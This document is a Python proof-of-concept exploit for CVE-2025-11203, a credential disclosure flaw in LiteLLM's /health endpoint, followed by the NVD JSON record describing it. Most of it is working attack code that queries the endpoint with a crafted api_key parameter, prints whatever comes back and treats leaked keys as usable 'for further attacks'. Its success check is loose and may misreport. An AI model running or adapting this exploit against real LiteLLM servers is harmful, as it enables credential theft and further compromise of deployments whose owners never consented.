CVE-2025-11203

# CVE-2025-11203 PoC - LiteLLM Health API Information Disclosure # Reference: ZDI-CAN-26585 import requests import json TARGET_URL = "http://target-litellm-server:4000" API_KEY = "your-authenticated-api-key" # Attacker needs low-privilege auth def exploit_cve_2025_11203(): """ Exploit for LiteLLM Information Disclosure via Health API This PoC demonstrates how API_KEY parameter leaks sensitive credentials """ headers = { "Authorization": f"Bearer {API_KEY}", "Content-Type": "application/json" } # The vulnerable endpoint - health API with API_KEY parameter vulnerable_endpoint = f"{TARGET_URL}/health" # Crafted request that triggers information disclosure # The API_KEY parameter in query causes sensitive data to be returned params = { "api_key": "test", # This parameter triggers the leak "suppress": "false" } try: response = requests.get( vulnerable_endpoint, headers=headers, params=params, verify=False, timeout=10 ) print(f"Status Code: {response.status_code}") print(f"Response Headers: {json.dumps(dict(response.headers), indent=2)}") print(f"Response Body: {json.dumps(response.json(), indent=2)}") # Check if sensitive information is leaked in response if "api_key" in response.text.lower() or "key" in response.text.lower(): print("[+] SUCCESS: Sensitive information disclosure detected!") print("[+] Extracted credentials may be used for further attacks") return True else: print("[-] No obvious information disclosure detected") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-11203 LiteLLM Information Disclosure PoC") print("=" * 60) exploit_cve_2025_11203()

{"cve": {"id": "CVE-2025-11203", "sourceIdentifier": "[email protected]", "published": "2025-10-29T20:15:35.937", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "LiteLLM Information health API_KEY Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of LiteLLM. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the handling of the API_KEY parameter provided to the health endpoint. The issue results from exposing sensitive information to an unauthorized actor. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-26585."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://docs.litellm.ai/release_notes/v1.63.14-stable", "source": "[email protected]"}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-929/", "source": "[email protected]"}]}}